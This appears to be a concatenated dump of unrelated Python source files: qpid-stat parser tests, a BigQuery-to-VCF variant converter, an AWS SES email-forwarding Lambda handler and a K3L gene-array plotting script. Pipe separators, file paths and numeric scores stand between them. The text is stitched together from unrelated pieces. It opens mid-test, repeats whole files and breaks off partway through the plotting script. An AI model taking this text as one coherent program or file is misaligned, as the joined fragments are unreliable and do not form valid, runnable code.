qpid_list = qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q))
assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
assert qpid_list.data[0].get('dur') == ''
assert qpid_list.data[1].get('queue') == 'server.example.com:event'
assert qpid_list.data[1].get('dur') == 'Y'
assert qpid_list.data[1].get('autoDel') == ''
assert qpid_list.data[1].get('excl') == 'Y'
assert qpid_list.data[1].get('msg') == '0'
assert qpid_list.data[1].get('msgIn') == '2.62k'
assert qpid_list.data[1].get('msgOut') == '2.62k'
assert qpid_list.data[1].get('bytes') == '0'
assert qpid_list.data[1].get('bytesIn') == '45.5m'
assert qpid_list.data[1].get('bytesOut') == '45.5m'
assert qpid_list.data[1].get('cons') == '1'
assert qpid_list.data[1].get('bind') == '2'
assert qpid_list.data[2].get('msg') == '4'
assert qpid_list.data[3].get('cons') == '0'
assert qpid_list.data[4].get('bytesIn') == '0'
assert qpid_list.data[5].get('queue') == 'reserved_resource_worker-7@<EMAIL>.dq'
assert qpid_list.data[5].get('dur') == 'Y'
assert qpid_list.data[5].get('autoDel') == 'Y'
assert qpid_list.data[5].get('excl') == ''
assert qpid_list.data[5].get('msg') == '0'
assert qpid_list.data[5].get('msgIn') == '182'
assert qpid_list.data[5].get('msgOut') == '182'
assert qpid_list.data[5].get('bytes') == '0'
assert qpid_list.data[5].get('bytesIn') == '229k'
assert qpid_list.data[5].get('bytesOut') == '229k'
assert qpid_list.data[5].get('cons') == '1'
assert qpid_list.data[5].get('bind') == '2'
# test iteration
assert [d['queue'] for d in qpid_list] == [
'00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
'server.example.com:event',
'celery',
'pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd',
'reserved_resource_worker-7@<EMAIL>.celery.pidbox',
'reserved_resource_worker-7@server.example.com.dq',
]
QPID_STAT_U = """
COMMAND> qpid-stat -u --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
katello_event_queue katello_event_queue qpid.10.20.1.10:5671-10.20.1.10:33911 ruby 21801 Y CREDIT 7,642 0
""".strip()
def test_qpid_stat_u():
qpid_list = qpid_stat.QpidStatU(context_wrap(QPID_STAT_U))
assert qpid_list.data[0].get('subscr') == '0'
assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
assert qpid_list.data[0].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33787'
assert qpid_list.data[0].get('procName') == 'celery'
assert qpid_list.data[0].get('procId') == '21409'
assert qpid_list.data[0].get('browse') == ''
assert qpid_list.data[0].get('acked') == ''
assert qpid_list.data[0].get('excl') == ''
assert qpid_list.data[0].get('creditMode') == 'CREDIT'
assert qpid_list.data[0].get('delivered') == '2'
assert qpid_list.data[0].get('sessUnacked') == '0'
assert qpid_list.data[1].get('queue') == 'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113'
assert qpid_list.data[1].get('conn') == 'qpid.10.20.1.10:5671-10.30.0.148:57423'
assert qpid_list.data[1].get('acked') == 'Y'
assert qpid_list.data[1].get('procName') == 'goferd'
assert qpid_list.data[2].get('subscr') == '1'
assert qpid_list.data[2].get('queue') == 'server.example.com:event'
assert qpid_list.data[2].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33848'
assert qpid_list.data[2].get('procName') == 'Qpid Java Client'
assert qpid_list.data[2].get('procId') == '21066'
assert qpid_list.data[2].get('browse') == ''
assert qpid_list.data[2].get('acked') == 'Y'
assert qpid_list.data[2].get('excl') == 'Y'
assert qpid_list.data[2].get('creditMode') == 'WINDOW'
assert qpid_list.data[2].get('delivered') == '2,623'
assert qpid_list.data[2].get('sessUnacked') == '0'
assert qpid_list.data[3].get('delivered') == '363,228'
assert qpid_list.data[5].get('subscr') == 'katello_event_queue'
# test iteration
assert [d['queue'] for d in qpid_list] == [
'00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113',
'server.example.com:event',
'celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d',
'celery',
'katello_event_queue',
] | insights/parsers/tests/test_qpid_stat.py | from insights.parsers import qpid_stat
from insights.tests import context_wrap
import doctest
QPID_STAT_Q_DOCS = '''
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
0f7f1a3d-daff-42a6-a994-29050a2eabde:1.0 Y Y 0 8 8 0 4.88k 4.88k 1 2
'''
QPID_STAT_U_DOCS = '''
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
'''
def test_qpid_stat_q_docs():
env = {
'qpid_stat_q': qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q_DOCS)),
'qpid_stat_u': qpid_stat.QpidStatU(context_wrap(QPID_STAT_U_DOCS)),
}
failed, total = doctest.testmod(qpid_stat, globs=env)
assert failed == 0
QPID_STAT_Q = """
COMMAND> qpid-stat -q --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
server.example.com:event Y Y 0 2.62k 2.62k 0 45.5m 45.5m 1 2
celery Y 4 41 37 4.12k 37.5k 33.4k 8 2
pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd Y 1 1 0 463 463 0 0 1
reserved_resource_worker-7@<EMAIL>.celery.pidbox Y 0 0 0 0 0 0 1 2
reserved_resource_worker-7@<EMAIL>.dq Y Y 0 182 182 0 229k 229k 1 2
""".strip()
def test_qpid_stat_q():
qpid_list = qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q))
assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
assert qpid_list.data[0].get('dur') == ''
assert qpid_list.data[1].get('queue') == 'server.example.com:event'
assert qpid_list.data[1].get('dur') == 'Y'
assert qpid_list.data[1].get('autoDel') == ''
assert qpid_list.data[1].get('excl') == 'Y'
assert qpid_list.data[1].get('msg') == '0'
assert qpid_list.data[1].get('msgIn') == '2.62k'
assert qpid_list.data[1].get('msgOut') == '2.62k'
assert qpid_list.data[1].get('bytes') == '0'
assert qpid_list.data[1].get('bytesIn') == '45.5m'
assert qpid_list.data[1].get('bytesOut') == '45.5m'
assert qpid_list.data[1].get('cons') == '1'
assert qpid_list.data[1].get('bind') == '2'
assert qpid_list.data[2].get('msg') == '4'
assert qpid_list.data[3].get('cons') == '0'
assert qpid_list.data[4].get('bytesIn') == '0'
assert qpid_list.data[5].get('queue') == 'reserved_resource_worker-7@<EMAIL>.dq'
assert qpid_list.data[5].get('dur') == 'Y'
assert qpid_list.data[5].get('autoDel') == 'Y'
assert qpid_list.data[5].get('excl') == ''
assert qpid_list.data[5].get('msg') == '0'
assert qpid_list.data[5].get('msgIn') == '182'
assert qpid_list.data[5].get('msgOut') == '182'
assert qpid_list.data[5].get('bytes') == '0'
assert qpid_list.data[5].get('bytesIn') == '229k'
assert qpid_list.data[5].get('bytesOut') == '229k'
assert qpid_list.data[5].get('cons') == '1'
assert qpid_list.data[5].get('bind') == '2'
# test iteration
assert [d['queue'] for d in qpid_list] == [
'00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
'server.example.com:event',
'celery',
'pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd',
'reserved_resource_worker-7@<EMAIL>.celery.pidbox',
'reserved_resource_worker-7@server.example.com.dq',
]
QPID_STAT_U = """
COMMAND> qpid-stat -u --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
katello_event_queue katello_event_queue qpid.10.20.1.10:5671-10.20.1.10:33911 ruby 21801 Y CREDIT 7,642 0
""".strip()
def test_qpid_stat_u():
qpid_list = qpid_stat.QpidStatU(context_wrap(QPID_STAT_U))
assert qpid_list.data[0].get('subscr') == '0'
assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
assert qpid_list.data[0].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33787'
assert qpid_list.data[0].get('procName') == 'celery'
assert qpid_list.data[0].get('procId') == '21409'
assert qpid_list.data[0].get('browse') == ''
assert qpid_list.data[0].get('acked') == ''
assert qpid_list.data[0].get('excl') == ''
assert qpid_list.data[0].get('creditMode') == 'CREDIT'
assert qpid_list.data[0].get('delivered') == '2'
assert qpid_list.data[0].get('sessUnacked') == '0'
assert qpid_list.data[1].get('queue') == 'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113'
assert qpid_list.data[1].get('conn') == 'qpid.10.20.1.10:5671-10.30.0.148:57423'
assert qpid_list.data[1].get('acked') == 'Y'
assert qpid_list.data[1].get('procName') == 'goferd'
assert qpid_list.data[2].get('subscr') == '1'
assert qpid_list.data[2].get('queue') == 'server.example.com:event'
assert qpid_list.data[2].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33848'
assert qpid_list.data[2].get('procName') == 'Qpid Java Client'
assert qpid_list.data[2].get('procId') == '21066'
assert qpid_list.data[2].get('browse') == ''
assert qpid_list.data[2].get('acked') == 'Y'
assert qpid_list.data[2].get('excl') == 'Y'
assert qpid_list.data[2].get('creditMode') == 'WINDOW'
assert qpid_list.data[2].get('delivered') == '2,623'
assert qpid_list.data[2].get('sessUnacked') == '0'
assert qpid_list.data[3].get('delivered') == '363,228'
assert qpid_list.data[5].get('subscr') == 'katello_event_queue'
# test iteration
assert [d['queue'] for d in qpid_list] == [
'00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113',
'server.example.com:event',
'celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d',
'celery',
'katello_event_queue',
] | 0.380068 | 0.27594 |
from typing import Any, Dict, List # pylint: disable=unused-import
from gcp_variant_transforms.beam_io import vcfio
from gcp_variant_transforms.libs.annotation import annotation_parser
from gcp_variant_transforms.libs import bigquery_schema_descriptor # pylint: disable=unused-import
from gcp_variant_transforms.libs import bigquery_util
from gcp_variant_transforms.libs import processed_variant # pylint: disable=unused-import
# Reserved constants for column names in the BigQuery schema.
RESERVED_BQ_COLUMNS = [bigquery_util.ColumnKeyConstants.REFERENCE_NAME,
bigquery_util.ColumnKeyConstants.START_POSITION,
bigquery_util.ColumnKeyConstants.END_POSITION,
bigquery_util.ColumnKeyConstants.REFERENCE_BASES,
bigquery_util.ColumnKeyConstants.ALTERNATE_BASES,
bigquery_util.ColumnKeyConstants.NAMES,
bigquery_util.ColumnKeyConstants.QUALITY,
bigquery_util.ColumnKeyConstants.FILTER,
bigquery_util.ColumnKeyConstants.CALLS]
RESERVED_VARIANT_CALL_COLUMNS = [
bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID,
bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE,
bigquery_util.ColumnKeyConstants.CALLS_PHASESET
]
class VariantGenerator():
"""Class to generate variant from one BigQuery row."""
def __init__(self, annotation_id_to_annotation_names=None):
# type: (Dict[str, List[str]]) -> None
"""Initializes an object of `VariantGenerator`.
Args:
annotation_id_to_annotation_names: A map where the key is the annotation
id (e.g., `CSQ`) and the value is a list of annotation names (e.g.,
['allele', 'Consequence', 'IMPACT', 'SYMBOL']). The annotation str
(e.g., 'A|upstream_gene_variant|MODIFIER|PSMF1|||||') is reconstructed
in the same order as the annotation names.
"""
self._annotation_str_builder = annotation_parser.AnnotationStrBuilder(
annotation_id_to_annotation_names)
def convert_bq_row_to_variant(self, row):
"""Converts one BigQuery row to `Variant`."""
# type: (Dict[str, Any]) -> vcfio.Variant
return vcfio.Variant(
reference_name=row[bigquery_util.ColumnKeyConstants.REFERENCE_NAME],
start=row[bigquery_util.ColumnKeyConstants.START_POSITION],
end=row[bigquery_util.ColumnKeyConstants.END_POSITION],
reference_bases=row[bigquery_util.ColumnKeyConstants.REFERENCE_BASES],
alternate_bases=self._get_alternate_bases(
row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]),
names=row[bigquery_util.ColumnKeyConstants.NAMES],
quality=row[bigquery_util.ColumnKeyConstants.QUALITY],
filters=row[bigquery_util.ColumnKeyConstants.FILTER],
info=self._get_variant_info(row),
calls=self._get_variant_calls(
row[bigquery_util.ColumnKeyConstants.CALLS])
)
def _get_alternate_bases(self, alternate_base_records):
# type: (List[Dict[str, Any]]) -> List[str]
return [record[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT]
for record in alternate_base_records]
def _get_variant_info(self, row):
# type: (Dict[str, Any]) -> Dict[str, Any]
info = {}
for key, value in row.items():
if key not in RESERVED_BQ_COLUMNS and not self._is_null_or_empty(value):
info.update({key: value})
for alt_base in row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]:
for key, value in alt_base.items():
if (key != bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT and
not self._is_null_or_empty(value)):
if key not in info:
info[key] = []
if self._annotation_str_builder.is_valid_annotation_id(key):
info[key].extend(
self._annotation_str_builder.reconstruct_annotation_str(
key, value))
else:
info[key].append(value)
return info
def _get_variant_calls(self, variant_call_records):
# type: (List[Dict[str, Any]]) -> List[vcfio.VariantCall]
variant_calls = []
for call_record in variant_call_records:
info = {}
for key, value in call_record.items():
if (key not in RESERVED_VARIANT_CALL_COLUMNS and
not self._is_null_or_empty(value)):
info.update({key: value})
variant_call = vcfio.VariantCall(
sample_id=call_record[
bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID],
genotype=call_record[bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE],
phaseset=call_record[bigquery_util.ColumnKeyConstants.CALLS_PHASESET],
info=info)
variant_calls.append(variant_call)
return variant_calls
def _is_null_or_empty(self, value):
# type: (Any) -> bool
if value is None:
return True
if isinstance(value, list) and not value:
return True
return False | gcp_variant_transforms/libs/bigquery_vcf_data_converter.py | from typing import Any, Dict, List # pylint: disable=unused-import
from gcp_variant_transforms.beam_io import vcfio
from gcp_variant_transforms.libs.annotation import annotation_parser
from gcp_variant_transforms.libs import bigquery_schema_descriptor # pylint: disable=unused-import
from gcp_variant_transforms.libs import bigquery_util
from gcp_variant_transforms.libs import processed_variant # pylint: disable=unused-import
# Reserved constants for column names in the BigQuery schema.
RESERVED_BQ_COLUMNS = [bigquery_util.ColumnKeyConstants.REFERENCE_NAME,
bigquery_util.ColumnKeyConstants.START_POSITION,
bigquery_util.ColumnKeyConstants.END_POSITION,
bigquery_util.ColumnKeyConstants.REFERENCE_BASES,
bigquery_util.ColumnKeyConstants.ALTERNATE_BASES,
bigquery_util.ColumnKeyConstants.NAMES,
bigquery_util.ColumnKeyConstants.QUALITY,
bigquery_util.ColumnKeyConstants.FILTER,
bigquery_util.ColumnKeyConstants.CALLS]
RESERVED_VARIANT_CALL_COLUMNS = [
bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID,
bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE,
bigquery_util.ColumnKeyConstants.CALLS_PHASESET
]
class VariantGenerator():
"""Class to generate variant from one BigQuery row."""
def __init__(self, annotation_id_to_annotation_names=None):
# type: (Dict[str, List[str]]) -> None
"""Initializes an object of `VariantGenerator`.
Args:
annotation_id_to_annotation_names: A map where the key is the annotation
id (e.g., `CSQ`) and the value is a list of annotation names (e.g.,
['allele', 'Consequence', 'IMPACT', 'SYMBOL']). The annotation str
(e.g., 'A|upstream_gene_variant|MODIFIER|PSMF1|||||') is reconstructed
in the same order as the annotation names.
"""
self._annotation_str_builder = annotation_parser.AnnotationStrBuilder(
annotation_id_to_annotation_names)
def convert_bq_row_to_variant(self, row):
"""Converts one BigQuery row to `Variant`."""
# type: (Dict[str, Any]) -> vcfio.Variant
return vcfio.Variant(
reference_name=row[bigquery_util.ColumnKeyConstants.REFERENCE_NAME],
start=row[bigquery_util.ColumnKeyConstants.START_POSITION],
end=row[bigquery_util.ColumnKeyConstants.END_POSITION],
reference_bases=row[bigquery_util.ColumnKeyConstants.REFERENCE_BASES],
alternate_bases=self._get_alternate_bases(
row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]),
names=row[bigquery_util.ColumnKeyConstants.NAMES],
quality=row[bigquery_util.ColumnKeyConstants.QUALITY],
filters=row[bigquery_util.ColumnKeyConstants.FILTER],
info=self._get_variant_info(row),
calls=self._get_variant_calls(
row[bigquery_util.ColumnKeyConstants.CALLS])
)
def _get_alternate_bases(self, alternate_base_records):
# type: (List[Dict[str, Any]]) -> List[str]
return [record[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT]
for record in alternate_base_records]
def _get_variant_info(self, row):
# type: (Dict[str, Any]) -> Dict[str, Any]
info = {}
for key, value in row.items():
if key not in RESERVED_BQ_COLUMNS and not self._is_null_or_empty(value):
info.update({key: value})
for alt_base in row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]:
for key, value in alt_base.items():
if (key != bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT and
not self._is_null_or_empty(value)):
if key not in info:
info[key] = []
if self._annotation_str_builder.is_valid_annotation_id(key):
info[key].extend(
self._annotation_str_builder.reconstruct_annotation_str(
key, value))
else:
info[key].append(value)
return info
def _get_variant_calls(self, variant_call_records):
# type: (List[Dict[str, Any]]) -> List[vcfio.VariantCall]
variant_calls = []
for call_record in variant_call_records:
info = {}
for key, value in call_record.items():
if (key not in RESERVED_VARIANT_CALL_COLUMNS and
not self._is_null_or_empty(value)):
info.update({key: value})
variant_call = vcfio.VariantCall(
sample_id=call_record[
bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID],
genotype=call_record[bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE],
phaseset=call_record[bigquery_util.ColumnKeyConstants.CALLS_PHASESET],
info=info)
variant_calls.append(variant_call)
return variant_calls
def _is_null_or_empty(self, value):
# type: (Any) -> bool
if value is None:
return True
if isinstance(value, list) and not value:
return True
return False | 0.911468 | 0.276562 |
import email
import json
import logging
import os
import re
import boto3
from botocore.exceptions import ClientError
# FORWARD_MAPPING = {recipient: os.environ.get('MSG_TO_LIST') for recipient in os.environ.get('MSG_TARGET')}
with open('mapping.json', 'r') as f:
FORWARD_MAPPING = json.load(f)
VERIFIED_FROM_EMAIL = os.environ.get('VERIFIED_FROM_EMAIL', '<EMAIL>') # An email that is verified by SES to use as From address.
SUBJECT_PREFIX = os.environ.get('SUBJECT_PREFIX') # label to add to a list, like `[listname]`
SES_INCOMING_BUCKET = os.environ['SES_INCOMING_BUCKET'] # S3 bucket where SES stores incoming emails.
S3_PREFIX = os.environ.get('S3_PREFIX', '') # optional, if messages aren't stored in root
s3 = boto3.client('s3')
ses = boto3.client('ses')
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
def handler(event, context):
record = event['Records'][0]
assert record['eventSource'] == 'aws:ses'
o = s3.get_object(Bucket=SES_INCOMING_BUCKET, Key=S3_PREFIX+record['ses']['mail']['messageId'])
raw_mail = o['Body'].read()
logger.info("body: {}".format(type(raw_mail)))
msg = email.message_from_bytes(raw_mail)
logger.info("m: {}".format(msg))
logger.info("keys: {}".format(msg.keys()))
logger.info("from: {}".format(msg['From']))
original_from = msg['From']
del msg['DKIM-Signature']
del msg['Sender']
del msg['Return-Path']
del msg['Reply-To']
del msg['From']
try:
from_email = re.search(r'\<(.*)\>', original_from).group(1)
except:
from_email = None
from_name = re.sub(r'\<.+?\>', '', original_from).strip()
if from_email != None:
msg['Reply-To'] = from_email.strip()
elif re.match(r'.+@.+\..{1,6}', from_name):
msg['Reply-To'] = from_name
else:
msg['Reply-To'] = VERIFIED_FROM_EMAIL
msg['Return-Path'] = VERIFIED_FROM_EMAIL
msg['From'] = from_name + ' <{}>'.format(VERIFIED_FROM_EMAIL)
new_subj = ' '.join([f'{original_from}: ', msg.get('Subject', '')])
del msg['Subject']
msg['Subject'] = new_subj
msg_string = msg.as_string()
for recipient in record['ses']['receipt']['recipients']:
logger.info("recipient: {}".format(recipient))
forwards = FORWARD_MAPPING.get(recipient, '')
if not forwards:
logger.warning('Recipent <{}> is not found in forwarding map. Skipping recipient.'.format(recipient))
continue
for address in forwards.split(','):
logger.info("addr: {}".format(address))
try:
o = ses.send_raw_email(Destinations=[address], RawMessage=dict(Data=msg_string))
logger.info('Forwarded email from <{}> to <{}>. SendRawEmail response={}'.format(recipient, address, json.dumps(o)))
except ClientError as e:
logger.error('Client error while forwarding email for <{}> to <{}>: {}'.format(recipient, address, e)) | handler.py | import email
import json
import logging
import os
import re
import boto3
from botocore.exceptions import ClientError
# FORWARD_MAPPING = {recipient: os.environ.get('MSG_TO_LIST') for recipient in os.environ.get('MSG_TARGET')}
with open('mapping.json', 'r') as f:
FORWARD_MAPPING = json.load(f)
VERIFIED_FROM_EMAIL = os.environ.get('VERIFIED_FROM_EMAIL', '<EMAIL>') # An email that is verified by SES to use as From address.
SUBJECT_PREFIX = os.environ.get('SUBJECT_PREFIX') # label to add to a list, like `[listname]`
SES_INCOMING_BUCKET = os.environ['SES_INCOMING_BUCKET'] # S3 bucket where SES stores incoming emails.
S3_PREFIX = os.environ.get('S3_PREFIX', '') # optional, if messages aren't stored in root
s3 = boto3.client('s3')
ses = boto3.client('ses')
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
def handler(event, context):
record = event['Records'][0]
assert record['eventSource'] == 'aws:ses'
o = s3.get_object(Bucket=SES_INCOMING_BUCKET, Key=S3_PREFIX+record['ses']['mail']['messageId'])
raw_mail = o['Body'].read()
logger.info("body: {}".format(type(raw_mail)))
msg = email.message_from_bytes(raw_mail)
logger.info("m: {}".format(msg))
logger.info("keys: {}".format(msg.keys()))
logger.info("from: {}".format(msg['From']))
original_from = msg['From']
del msg['DKIM-Signature']
del msg['Sender']
del msg['Return-Path']
del msg['Reply-To']
del msg['From']
try:
from_email = re.search(r'\<(.*)\>', original_from).group(1)
except:
from_email = None
from_name = re.sub(r'\<.+?\>', '', original_from).strip()
if from_email != None:
msg['Reply-To'] = from_email.strip()
elif re.match(r'.+@.+\..{1,6}', from_name):
msg['Reply-To'] = from_name
else:
msg['Reply-To'] = VERIFIED_FROM_EMAIL
msg['Return-Path'] = VERIFIED_FROM_EMAIL
msg['From'] = from_name + ' <{}>'.format(VERIFIED_FROM_EMAIL)
new_subj = ' '.join([f'{original_from}: ', msg.get('Subject', '')])
del msg['Subject']
msg['Subject'] = new_subj
msg_string = msg.as_string()
for recipient in record['ses']['receipt']['recipients']:
logger.info("recipient: {}".format(recipient))
forwards = FORWARD_MAPPING.get(recipient, '')
if not forwards:
logger.warning('Recipent <{}> is not found in forwarding map. Skipping recipient.'.format(recipient))
continue
for address in forwards.split(','):
logger.info("addr: {}".format(address))
try:
o = ses.send_raw_email(Destinations=[address], RawMessage=dict(Data=msg_string))
logger.info('Forwarded email from <{}> to <{}>. SendRawEmail response={}'.format(recipient, address, json.dumps(o)))
except ClientError as e:
logger.error('Client error while forwarding email for <{}> to <{}>: {}'.format(recipient, address, e)) | 0.332961 | 0.054879 |
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import sys
import seaborn as sns
import pandas as pd
import scipy.stats as ss
import numpy as np
import random
from collections import defaultdict, OrderedDict
from extract_arrays import extract_arrays, get_refseq, create_random_arrays
import argparse
from itertools import product
def get_counts(arrays, cart_prods, cn=2):
"""
function to count every possible combination
of WT and His47Arg copies in a population of K3L arrays
"""
all_combos = OrderedDict()
for combo in cart_prods:
count = sum([1 if combo == ''.join([str(x) for x in a]) else 0 for a in arrays])
all_combos[combo] = count
return all_combos
def run(args):
if len(args.bams) == 1:
print >> sys.stderr, "ERROR: please specify more than 1 BAM"
sys.exit()
# setting up the figure object
sns.set_style('ticks')
f, axarr = plt.subplots(len(args.bams), 1, figsize=(8,10))
pal = sns.color_palette('Blues', len(args.bams))
refseq = get_refseq(args.ref)
for i,bam in enumerate(args.bams):
name = bam.split('/')[-1].split('.')[0].upper()
arrays = extract_arrays(bam, refseq, copy_filter='hard').arrays
af = extract_arrays(bam, refseq, copy_filter='hard').af
# limit analysis to arrays of the specified copy number
filtered_arrays = [tuple(a) for a in arrays if len(a) == args.cn]
# determine all possible combinations of alleles in a array of `cn` copy
# number using cartesian products
cart_prods = [''.join([str(x) for x in g]) for g in product([0,1], repeat=args.cn)]
cart_prods = sorted(cart_prods, key=lambda x: x.count('1'))
# count every instance of these combinations in the sequenced data
all_combos = get_counts(filtered_arrays, cart_prods, cn=args.cn)
# count every array of the specified copy number
total_cn_arrays = float(sum(all_combos.values()))
# count the total number of arrays with mixed alleles
total_mixed = float(sum(all_combos.values()[1:-1]))
frac_mixed = total_mixed / total_cn_arrays
x = range(len(cart_prods))
# get the fraction of each allele combination in the sequence data
y = [_ / total_cn_arrays for _ in all_combos.values()]
axarr[i].plot(x, y, color=pal[i], marker='o', label='observed')
axarr[i].text((len(x) - 1) / 4., (np.max(y) - np.min(y)) / 2. + 0.05,
'Mixed array fraction {}'.format(round(sum(y[1:-1]), 2)))
axarr[i].axvline(1, color='r', ls=':')
axarr[i].axvline(len(x) - 2, color='r', ls=':')
axarr[i].tick_params(axis='y', labelsize=12.5, color='k')
axarr[i].tick_params(axis='x', labelsize=12.5, color='k')
axarr[i].spines['left'].set_color('k')
axarr[i].spines['bottom'].set_color('k')
axarr[i].legend()
# figure/axis formatting
if i == len(args.bams) - 1:
axarr[i].set_xticks(x)
axarr[i].set_xticklabels(['-'.join(list(c)) for c in cart_prods])
axarr[i].set_xlabel('Allele combination (0 = $K3L^{WT}$, 1 = $K3L^{His47Arg}$)')
else:
axarr[i].get_xaxis().set_visible(False)
axarr[i].set_title(name)
for tick in axarr[i].get_xticklabels():
tick.set_rotation(45)
if i == 1:
axarr[i].set_ylabel("Proportion of arrays")
sns.despine(ax=axarr[i], trim=True)
if args.png:
plt.savefig(args.o + '.png', format='png', bbox_inches='tight')
else:
plt.savefig(args.o + '.eps', format='eps', bbox_inches='tight')
def main(argv):
import argparse
p = argparse.ArgumentParser()
p.add_argument("--bams", required = True, help='Path to sorted BAM files.', nargs='*')
p.add_argument("--ref", required = True, help='Path to FASTA reference genome.')
p.add_argument("-cn", type=int, default=3, help='Plot arrays with this many copies of K3L. (default = 3)')
p.add_argument("-o", help='Name of output plot.', default='array-combinations')
p.add_argument('-png', help='Output as png.', action='store_true')
run(p.parse_args(argv))
if __name__ == "__main__":
import sys
main(sys.argv[1:]) | array_combinations.py | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import sys
import seaborn as sns
import pandas as pd
import scipy.stats as ss
import numpy as np
import random
from collections import defaultdict, OrderedDict
from extract_arrays import extract_arrays, get_refseq, create_random_arrays
import argparse
from itertools import product
def get_counts(arrays, cart_prods, cn=2):
"""
function to count every possible combination
of WT and His47Arg copies in a population of K3L arrays
"""
all_combos = OrderedDict()
for combo in cart_prods:
count = sum([1 if combo == ''.join([str(x) for x in a]) else 0 for a in arrays])
all_combos[combo] = count
return all_combos
def run(args):
